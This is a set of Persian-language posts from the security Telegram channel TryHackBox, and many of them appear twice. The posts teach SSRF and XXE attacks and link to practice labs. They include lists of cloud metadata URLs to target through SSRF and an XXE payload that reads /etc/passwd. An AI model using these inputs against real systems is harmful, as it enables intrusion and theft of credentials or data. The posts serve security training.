☁️ آدرس منابع ابری برای دسترسی از طریق SSRF
هنگامی که SSRF را پیدا کردید، قدم بعدی شما این است که سعی کنید به منابع داخلی دسترسی داشته باشید و چیزی ارزشمند را در آنجا پیدا کنید.
و اگر نمونه ها و مقالات بسیار زیادی برای AWS وجود دارد، پس با سایر منابع ابری چه باید کرد؟ در زیر لیستی از URLهای جالب برای Oracle Cloud، Alibaba و Digital Ocean آمده است.
Oracle Cloud:
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
Alibaba :
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
Digital Ocean :
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
#Web #SSRF #Cloud
@TryHackBox
@TryHackBoxOfficial
هنگامی که SSRF را پیدا کردید، قدم بعدی شما این است که سعی کنید به منابع داخلی دسترسی داشته باشید و چیزی ارزشمند را در آنجا پیدا کنید.
و اگر نمونه ها و مقالات بسیار زیادی برای AWS وجود دارد، پس با سایر منابع ابری چه باید کرد؟ در زیر لیستی از URLهای جالب برای Oracle Cloud، Alibaba و Digital Ocean آمده است.
Oracle Cloud:
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
Alibaba :
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
Digital Ocean :
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
#Web #SSRF #Cloud
@TryHackBox
@TryHackBoxOfficial
🔥3
🔬 آزمایشگاه های رایگان برای تمرین عملیات SSRF
این لیست شامل آزمایشگاههای آنلاین و آزمایشگاههایی است که میتوانید در محیط آزمایشی خودتان اجرا کنید.
🗄 PortSwigger SSRF Labs
🗄 Server-Side Request Forgery (SSRF) vulnerable Lab
🗄 Vulnado SSRF Lab
🗄 Snyk SSRF Lab
🗄 Kontra SSRF Lab
#Web #SSRF
@TryHackBox
@TryHackBoxOfficial
این لیست شامل آزمایشگاههای آنلاین و آزمایشگاههایی است که میتوانید در محیط آزمایشی خودتان اجرا کنید.
🗄 PortSwigger SSRF Labs
🗄 Server-Side Request Forgery (SSRF) vulnerable Lab
🗄 Vulnado SSRF Lab
🗄 Snyk SSRF Lab
🗄 Kontra SSRF Lab
#Web #SSRF
@TryHackBox
@TryHackBoxOfficial
👍3
Media is too big
VIEW IN TELEGRAM
🏃♂️ روش SSRF .
جریانی از KathanP19 ، اختصاص داده شده به روش جستجوی آسیبپذیریهای SSRF در حالت دستی و خودکار.
جعل درخواست سمت سرور (SSRF) نوعی آسیب پذیری برنامه وب است که به مهاجم اجازه می دهد درخواست های HTTP دلخواه را از یک برنامه وب آسیب پذیر به یک سرور خارجی ارسال کند. یک برنامه را می توان فریب داد تا درخواست های مخرب را به سیستم های داخلی ارسال کند که می تواند منجر به افشای داده های حساس یا سایر مسائل امنیتی شود.
#SSRF #Web
@TryHackBox
@TryHackBoxOfficial
جریانی از KathanP19 ، اختصاص داده شده به روش جستجوی آسیبپذیریهای SSRF در حالت دستی و خودکار.
جعل درخواست سمت سرور (SSRF) نوعی آسیب پذیری برنامه وب است که به مهاجم اجازه می دهد درخواست های HTTP دلخواه را از یک برنامه وب آسیب پذیر به یک سرور خارجی ارسال کند. یک برنامه را می توان فریب داد تا درخواست های مخرب را به سیستم های داخلی ارسال کند که می تواند منجر به افشای داده های حساس یا سایر مسائل امنیتی شود.
#SSRF #Web
@TryHackBox
@TryHackBoxOfficial
👍5
📌 حملات XXE (تزریق XML) - بخش اول
🔹حمله XXE چیست؟
حملۀ XXE (XML External Entity Injection) یک آسیبپذیری امنیتی در پردازش دادههای XML است که به مهاجم اجازه میدهد به فایلهای سیستم سرور دسترسی پیدا کند یا با سیستمهای backend تعامل داشته باشد. در برخی موارد، این آسیبپذیری میتواند منجر به حملههای جعل درخواست سمت سرور (SSRF) یا حتی اختلال در سرویس (DoS) شود.
🔹 انواع حملات XXE
1. استخراج فایلها (مثلاً خواندن
2. حملات SSRF (ارسال درخواست به سیستمهای داخلی)
3. انتقال دادهها به صورت خارج از باند (OOB)
4. استخراج داده از طریق پیامهای خطا
🔹 مثال ساده از XXE:
در این مثال، مهاجم محتوای فایل
ادامه در بخش بعدی...
✍️نویسنده
@TryHackBox | The Chaos
#XXE #SSRF #CyberSecurity
🔹حمله XXE چیست؟
حملۀ XXE (XML External Entity Injection) یک آسیبپذیری امنیتی در پردازش دادههای XML است که به مهاجم اجازه میدهد به فایلهای سیستم سرور دسترسی پیدا کند یا با سیستمهای backend تعامل داشته باشد. در برخی موارد، این آسیبپذیری میتواند منجر به حملههای جعل درخواست سمت سرور (SSRF) یا حتی اختلال در سرویس (DoS) شود.
🔹 انواع حملات XXE
1. استخراج فایلها (مثلاً خواندن
/etc/passwd
) 2. حملات SSRF (ارسال درخواست به سیستمهای داخلی)
3. انتقال دادهها به صورت خارج از باند (OOB)
4. استخراج داده از طریق پیامهای خطا
🔹 مثال ساده از XXE:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
در این مثال، مهاجم محتوای فایل
/etc/passwd
را میخواند. ادامه در بخش بعدی...
✍️نویسنده
@TryHackBox | The Chaos
#XXE #SSRF #CyberSecurity
🔥4❤1